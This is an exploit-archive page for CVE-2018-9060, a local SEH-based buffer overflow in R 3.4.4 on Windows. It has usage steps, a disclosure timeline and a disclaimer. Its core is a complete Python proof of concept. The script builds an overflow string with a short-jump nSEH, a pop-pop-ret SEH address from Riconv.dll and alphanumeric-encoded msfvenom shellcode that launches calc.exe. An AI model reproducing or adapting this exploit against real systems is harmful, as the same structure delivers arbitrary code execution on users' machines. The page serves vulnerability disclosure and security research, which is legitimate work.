R 3.4.4 CVE-2018-9060 Local Buffer Overflow

Authors:bzyo              Risk:High 

CVE:CVE-2018-9060        0day:Local Buffer Overflow 

0day -id:0DAY-9060        Date:2018-04-25

Description

R 3.4.4 suffers from a local buffer overflow that allows code execution.

Exploit

1 run script and generate r344.txt, copy contents to clipboard

2 open app, select Edit, select 'GUI preferences'

3 paste r344.txt contents into 'Language for menus and messages'

4 select OK

5 pop calc

#!/usr/bin/python
 
#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
#
# PoC: 
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
 
 
filename="r344.txt"
 
junk = "A"*900
 
#jump 6
nseh = "\xeb\x06\xcc\xcc"
 
#0x643c17af : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [Riconv.dll]
seh = "\xaf\x17\x3c\x64"
 
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
 
fill = "D"*8000
 
buffer = junk + nseh + seh + calc + fill
   
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Timeline

03-27-18: Emailed author, no response
04-03-18: Emailed author, no response
04-10-18: Emailed author, no response
04-23-18: New version released; Submitted public disclosure

Disclaimer

Content is for educational and research purposes only. Author doesn’t hold any responsibility over the misuse of the software, exploits or security findings contained herein and does not condone them whatsoever.

Leave a Reply